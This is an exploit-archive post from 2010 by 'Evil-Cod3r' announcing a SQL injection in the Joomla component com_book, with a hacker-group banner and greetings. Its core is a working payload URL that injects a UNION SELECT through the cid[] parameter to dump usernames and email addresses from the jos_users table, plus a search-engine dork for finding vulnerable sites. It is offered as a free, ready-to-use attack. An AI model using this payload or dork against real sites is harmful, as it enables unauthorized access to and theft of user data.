[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component com_book SQL injection Vulnerability
# Published : 2010-01-21
# Author : Evil-Cod3r
# Previous Title : eWebeditor Directory Traversal
# Next Title : SHOUTcast Server Version <= 1.9.8/win32 CSRF Vulnerability
==============================================================================
_ _ _ _ _ _
/ | | | | / | | | |
/ _ | | | | / _ | |_| |
/ ___ | |___ | |___ / ___ | _ |
IN THE NAME OF /_/ _ |_____| |_____| /_/ _ |_| |_|
==============================================================================
[?] ~ Note : : <3 v4sploiter
==============================================================================
[?] Joomla (com_book) SQL injection Vulnerability
==============================================================================
[?] Script: [ Joomla Comp ]
[?] Language: [ PHP ]
[?] Dork: [ inurl:"com_book" ]
[?] Founder: [ Evil-Cod3r ]
[?] Gr44tz: [ v4sploiter - Mr.SaFa7 - Red Virus - Mn7os - Recruit ='( ]
[?] Team: [ v4-Team.com/cc ]
[?] Price: [ Free ]
###########################################################################
http://localhost/path/index.php?option=com_book&controller=listtour&task=showTour&cid[]=Exploit
Exploit : -
index.php?option=com_book&controller=listtour&task=showTour&cid[]=-1 union all select 1,concat(username,0x3a,email),3,4,5,6,7,8,9,10 from jos_users--
Author: Evil-Cod3r
###########################################################################